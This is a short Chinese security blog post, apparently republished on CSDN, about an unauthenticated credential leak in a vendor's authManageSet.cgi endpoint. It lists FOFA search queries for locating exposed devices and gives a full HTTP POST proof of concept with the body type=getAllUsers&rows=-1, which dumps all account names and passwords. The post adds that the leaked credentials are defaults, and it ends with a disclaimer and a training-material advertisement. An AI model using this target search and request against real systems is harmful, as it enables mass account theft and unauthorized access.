师傅们,我来水一篇文章,最近出了某神的authManageSet.cgi接口泄露账号密码,直接构造特定的数据包可直接发现账号密码。
一.资产
fofa语法:
body=“sec_gate_image/login_02.gif”
fid=“ldb0WVBlAgZloMw9AAge0A==”
二.直接上POC
POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1``Host: ip:port``Cache-Control: max-age=0``Upgrade-Insecure-Requests: 1``Accept-Encoding: gzip, deflate``Accept-Language: zh-CN,zh;q=0.9``Connection: close``Content-Type: application/x-www-form-urlencoded``Content-Length: 77`` ``type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc
三.复现过程
**发现该账号密码还是该产品的默认账号密码,使用了该产品的师傅们记得及时联系厂商修复以及更改默认账号密码!**
四.总结
继续为我国网络安全事业奋斗!
免责声明: 本文章仅做网络安全技术研究使用!另利用网络安全007公众号所提供的所有信息进行违法犯罪或造成任何后果及损失,均由使用者自身承担负责,与网络安全007公众号无任何关系,也不为其负任何责任,请各位自重!公众号发表的一切文章如有侵权烦请私信联系告知,我们会立即删除并对您表达最诚挚的歉意!感谢您的理解!让我们一起为我国网络安全事业尽一份自己的绵薄之力! |
为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
